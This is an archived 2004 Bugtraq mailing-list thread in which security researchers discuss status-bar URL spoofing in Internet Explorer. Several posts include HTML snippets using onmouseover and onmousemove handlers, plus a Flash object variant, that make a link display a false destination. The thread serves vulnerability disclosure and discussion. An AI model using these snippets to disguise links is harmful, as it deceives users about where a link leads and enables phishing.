| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 17 Nov 2004 05:55:07 +0000 From: GuidoZ <uberguidoz@...il.com> To: q q <systemcracker@...il.com> Cc: bugtraq@...urityfocus.com Subject: Re: New URL spoofing bug in Microsoft Internet Explorer > <a href="http://www.google.com" > onmousemove="window.status='http://www.msn.com';" > onmouseout="window.status='Done.';">Visit Msn!</a> Again, another way of "abusing a useful feature" more then an exploit. =P Good point. (I pointed out something similar to this long ago. Read on.) > <a href="http://www.google.com" > onmouseover="window.status='http://www.msn.com';" > onmouseout="window.status='Done.';">Visit Msn!</a> This certainly does still work, when coded correctly. Like this for example... <a HREF="http://www.google.com/" onMouseOver="window.status='http://www.microsoft.com/';return true" onMouseOut="window.status='Done';return true">Visit Microsoft!</a> I mentioned this quite awhile back actually (10-29-04). I documented the method (as well as the original post) at the following page: - http://www.guidoz.com/btstatusurl.html I'm not sure if all my original emails ever made it to BT. I seem to remember some bounced (I was out of town and didn't bother to resubmit). A reason for this escapes me though. (One wasn't provided.) Hopefully this will make it. =) -- Peace. ~G On Tue, 16 Nov 2004 16:11:05 +0000, q q <systemcracker@...il.com> wrote: > I thought this was obvious, but having seen the amount of discussion, > here's another URL spoofer: > > <a href="http://www.google.com" > onmousemove="window.status='http://www.msn.com';" > onmouseout="window.status='Done.';">Visit Msn!</a> > > note that > > <a href="http://www.google.com" > onmouseover="window.status='http://www.msn.com';" > onmouseout="window.status='Done.';">Visit Msn!</a> > > won't work - it seems MS have already half fixed this.... > > (tested on MSIE 6.0, winXP) > > On 8 Nov 2004 23:30:55 -0000, roozbeh afrasiabi > <roozbeh_afrasiabi@...oo.com> wrote: > > In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@...computer> > > > > Here is another way of spoofing the status bar: > > > > <a> tag + <object> tag > > > > <!--A HREF=http://www.yahoo.com><!--OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" > > > > codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" > > > > WIDTH="300" HEIGHT="50" id="link" ALIGN=""> > > > > <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > <PARAM NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu > > > > VALU=FALSE> > > > > <EMBED src="link.swf" quality=high bgcolor=#FFFFFF WIDTH="300" HEIGHT="50" NAME="link" ALIGN="" > > > > TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED> > > > > </a></OBJECT></a> > > > > *this method of spoofing the status bar allows malicious users to hide the target url from suspecting ppl ,demo page uses flash to generate > > > > random urls. > > > > demo: > > > > http://www.persiax.com/pocs/statusbar/status.htm > > > > > > -- > PHP, mySQL Security and more at http://www.puremango.co.uk >
Powered by blists - more mailing lists